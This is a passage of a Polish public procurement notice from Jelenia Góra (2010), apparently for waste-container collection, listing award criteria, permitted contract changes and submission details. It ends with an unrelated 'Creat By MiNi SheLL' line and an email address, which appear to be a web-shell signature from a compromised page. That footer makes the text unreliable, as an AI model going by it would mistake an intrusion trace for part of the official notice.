<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści
     oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
a)	zmiany przepisów Ustawy o podatku od towarów i usług w zakresie wysokości stawki VAT
b)	zmniejszenia ilości pojemników na odpady, zmiany ich ilości i częstotliwości ich wywozu lub całkowitego wyłączenia z umowy w przypadkach: 
.	zbycia nieruchomości
.	zmniejszenia ilości mieszkańców
.	powstania nowych Wspólnot Mieszkaniowych
.	rozbiórek budynków
.	wyłączenia z eksploatacji
.	itp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgl.jga.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Lokalowej Południe Sekcja Zamówień Publicznych ul. Wolności 41, 58-500 Jelenia Góra
Opłata: 5,00 Waluta PLN..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2010 godzina 09:00, miejsce: Ofertę należy złożyć w siedzibie Sekcji Zamówień Publicznych ZGL Południe w Jeleniej Górze  przy ul. Wolności 41.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com